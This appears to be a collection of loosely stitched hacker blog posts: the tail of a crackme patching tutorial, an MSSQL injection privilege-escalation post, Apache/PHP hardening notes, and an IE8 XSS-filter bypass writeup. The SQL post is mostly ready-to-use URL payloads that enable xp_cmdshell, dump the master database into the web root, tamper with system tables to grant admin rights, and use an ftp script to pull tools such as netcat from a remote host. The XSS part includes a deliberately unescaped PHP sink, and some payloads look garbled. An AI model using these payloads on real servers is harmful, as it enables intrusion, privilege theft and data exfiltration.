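On a real binary you would read the file into a buffer, call patch_jnz_to_jz with 0x08048406, and write the buffer back; the opcode check is what keeps a mistyped address from turning some unrelated byte into 0x74.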
That's it; the whole routine was simple.
But don't be too happy, because when the code gets bigger you will run into real problems (why? because there is no Olly or IDA, and no simple code to reverse),
and you must work from the command line through many lines of code.

In the next step we are going to crack a bigger crackme, called CrackMe2, which uses functions.
Good luck

Ms-Sql Injection Privilege Escalation !

Hi God .

Hi again, my readers!
[Attention]: I break long commands across lines.
1- In MSSQL, when your privilege is USER or db_owner you can register xp_dirtree and list any drive you want (the two hex strings are UCS-2 for xp_dirtree and xpstar.dll; note that sp_addextendedproc itself requires sysadmin, so in practice this works when the application's login is a sysadmin):

viewdetail.aspx?test=22';exec+master.dbo.sp_addextendedproc+
+0x780070005f006400690072007400720065006500,0x7800700073007400610072002e0064006c006c00--

After registering it you can execute xp_dirtree, save the result into a table and view it.

2- Enable command execution with administrator privilege when you have no execute permission:

Enable xp_cmdshell:

viewdetail.aspx?test=22';EXEC+sp_configure+
+'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;

Enable OLE Automation procedures:

viewdetail.aspx?test=22';exec sp_configure 'show advanced options',1;RECONFIGURE;
exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;

Then execute:

viewdetail.aspx?test=22';EXEC xp_cmdshell 'ping 127.0.0.1';

3- Back up the database into the web root (the file is then downloadable over HTTP and contains the data in readable form; the SQL Server service account must have write access to that path):

viewdetail.aspx?test=22';BACKUP database master to disk='d:\Inetpub\wwwroot\1.zip';--

4- GUEST = DB_OWNER (SQL Server 2000 trick through sp_msdropretry):

/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers'
exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx' exec sp_executesql N'drop view dbo.test'--

5- Adding to BUILTIN\ADMINISTRATORS:

FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysxlogins' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set xstatus=18 where name=''BUILTIN\ADMINISTRATORS''','xx' exec sp_executesql N'drop view dbo.test'--

and then:

FullStory.asp?id=1;exec master..sp_addsrvrolemember 'nhaxinh',sysadmin --

ENABLE OPENROWSET/OLEDB:

FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--

6- Open a remote link:

/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--

7- Upload netcat or another tool, going through openrowset back into the server's own xp_cmdshell with an ftp script:

/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=','set fmtonly off select 1 exec master..xp_cmdshell "echo open a.b.c.d >f & echo user a a >>f & echo bin >>f & echo cd a >>f & echo mget * >>f & echo quit >>f & ftp -v -i -n -s:f" & del f')--

Code (the ftp script, line by line):

echo open a.b.c.d >f
echo user a a >>f
echo bin >>f
echo cd a >>f
echo mget * >>f
echo quit >>f
ftp -v -i -n -s:f
del f

Another way?!

You can use Pangolin, a good SQL injector that bypasses some protections:

Download:

http://www.nosec.org/

Enjoy .

Daphne .

Is your Apache in safe mode ?

This post is a brief review of Apache security. It does not contain all the details, but I want to write them all eventually.

When you decide to build a web server based on an open source OS for web publishing, public or private, not all features are needed, and some of them must be changed carefully. We have two cases of Apache use here:

Case 1: In some cases you need to build a simulated FTP server based on the HTTP protocol.

Case 2: You need to build a mail server with an HTTP interface, such as Horde or SquirrelMail.

So what changes are needed? Which features are usable for your job?

In a default Apache installation, on a wide range of open source operating systems, you may see auto-indexing and directory browsing enabled. That is fine for an HTTP server acting as an FTP server, but is it usable for an HTTP mail server? Of course the answer is no. Why? It is simple. In case 1 you just need to give your users permission to read files and browse directories, and only that, while denying them reading or browsing of other directories. In case 2 the server design may share case 1's configuration, but here you must use an interpreter for your scripts and language. So if directory browsing is not denied, what is possible? An attacker can move up to a parent directory and see your most important data, such as the web server configuration or some log files, and a higher-level script kiddie could copy your password file anywhere. Now your web server is really crackable: an attacker can read your configuration and may change it! So what should you do? Good question.

1- Change the permissions of all unneeded directories to deny other users and groups, like:

"[root@server] # chmod -R 700 some_directory_you_want_hidden_from_others"

Directory listing itself is an Apache option rather than a file permission: Options -Indexes in the matching <Directory> block turns auto-indexing off.

2- Change the permissions of your files so they are only readable by the www user and not executable (for HTML pages, and for script-based pages too):

"[root@server]# chmod 644 *.php" (or your other scripts)
3- If your pages are PHP you can tune php.ini a bit.

On my machine:

[root@t4yt4n1 /usr/home/t4z3v4r3d]# cat /usr/local/etc/php.ini | grep basedir
; open_basedir, if set, limits all file operations to the defined directory
open_basedir = /usr/local/www
[root@t4yt4n1 /usr/home/t4z3v4r3d]#

Set open_basedir to your www directory; this blocks some PHP shell scripts like c99.php from reading files outside it. Note that open_basedir only constrains PHP's file functions: a shell that runs commands through exec() or system() is stopped by disable_functions, not by open_basedir.

What can PHP shells do?

Hi, this is the second part of Apache security.
We want to look at how to keep all of our scripts safe when we host several sites.
On shared (commercial) servers we can secure our server with applications such as cPanel or Plesk.
But how can we secure it by hand? Of course it is not so simple, but it is not hard to do.
OK, let's see what we can do, and let's look at it from the attacker's side.
Any attacker wants some information before a successful attack on a server.
But what information exactly? Yes, any information; all of it may help the attacker get into your server.
The kind of web server, its version, the OS version and type, the modules your web server is running, the server admin's mail, the DNS server, and so on: all good information for starting an attack.

Some of this information can't be hidden, but some can!
We can change our server's operating system name and the web server name, type and version with some tools and mods (soon); in httpd.conf, ServerTokens Prod and ServerSignature Off are the first step.

All attack methods depend on the security of your server.

OK, we have made some changes in our Apache configuration.
But is it enough? Put another way: what is the set of security settings for
Apache? Security is a collection of small, often invisible notes. You can't stop web visitors from looking at your content within a short period of time (in fact you can't tell users: browse my web content only once), but you can stop them from browsing the whole site in a short period, or from attacks such as directory traversal or denial of service, which can eat a large amount of server resources. You can detect such an attack and ban the attacker. Apache is now built from modules, and we can select the modules we need for protection.
Modules may be helpful tools if you have enough information about how each module works. Apache has three release lines, 1.3.x, 2.0.x and 2.2.x, and all of them can use modules.
For any platform you want to work on you may need some changes in configuration, giving resources to the web server, changing firewall rules, and so on. But you are the module selector and you are the lord of the Apache world. Deciding which modules are needed is your job, and tuning Apache is your art.
This is the end of section one for now, because I have no time to continue. I'll be back very soon; I want to build an HTTP server on my BSD box, and all the notes are real. In the next section we look at the details.

internet explorer 8 XSS filter bypassing

IE8 is Microsoft's new browser, with more complete CSS 2.1 support, HTML5 support,
built-in developer tools and so on. IE8 also brings a very big improvement in browser security: a
built-in XSS Filter that gives relatively good protection against non-persistent (reflected)
cross-site scripting. However, 80sec found during testing that the XSS Filter has a vulnerability,
so that on some East Asian locale versions it simply cannot stop URL-based XSS; for example,
on a Simplified Chinese system (code page gb2312) some simple data can bypass the IE8 filter.

Vulnerability analysis: the IE8 XSS Filter does its keyword matching in the system's built-in (ANSI) code page,
which is gb2312 on a Chinese system and the corresponding multibyte encoding on other East Asian systems.
A submitted sequence such as %c1< is therefore read by the filter as one ordinary two-byte character, so the
keyword match never sees a <. The page, however, declares UTF-8, and in UTF-8 %c1< is not a valid sequence,
so the browser's parser treats it as two characters and the < reaches the HTML parser. This inconsistency
between how the filter decodes the input and how the page is decoded is the vulnerability.
Proof: assume the web script:


<?php
header("Content-Type: text/html; charset=utf-8");
echo $_GET['c'];   // reflected without encoding: the XSS sink
?>

On an East Asian locale IE8 system, a conventional XSS such as:

.php?c=<script>alert()</script>

is stopped by the IE8 security policy, but if the < is preceded by the %c1 byte described above,
the code bypasses the IE8 XSS filter and executes.

Vulnerability state: reported to Microsoft (by Chinese hackers) and awaiting a response.
